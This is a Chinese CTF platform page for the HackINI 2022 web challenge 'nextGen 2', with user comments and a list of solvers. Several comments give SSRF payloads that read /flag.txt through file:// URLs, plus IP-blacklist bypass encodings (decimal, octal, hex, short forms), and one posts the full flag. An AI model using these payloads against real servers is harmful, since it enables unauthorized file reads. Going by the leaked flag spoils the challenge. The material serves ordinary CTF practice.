nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1076
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
Aerelin 6天前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 2月前

service=file://127.0.0.01/flag.txt

回复 0

bugku111222 5月前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0

零基础110 5月前

shellmates{**********}

回复 0

2ew123123124 5月前

shellmates{******}

回复 0

lunarbyside 5月前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 2

脆脆sha_ 12月前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 3月前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 3

MOCHAOLIN 1年前

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

868954104 1年前

shellmates{Y0u_d1D_1t_aG4iN_!!} service=file://2130706433/flag.txt

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

liukaidi 攻破了该题 8小时前
flyer 攻破了该题 10小时前
muumuu 攻破了该题 2天前
Linkbag 攻破了该题 3天前
chan52001 攻破了该题 4天前
Chibits 攻破了该题 4天前
Zengan 攻破了该题 9天前
18270753375 攻破了该题 10天前
wqhgod 攻破了该题 12天前
IAMGLORIA 攻破了该题 13天前
soha 攻破了该题 14天前
37519 攻破了该题 15天前
pure0white0sword 攻破了该题 15天前
13612180109 攻破了该题 15天前
mmdexb 攻破了该题 16天前
xjuqwd 攻破了该题 16天前
yamojito 攻破了该题 18天前
联通安抚载 攻破了该题 18天前
joyann 攻破了该题 18天前
ilyfotul 攻破了该题 19天前
问题反馈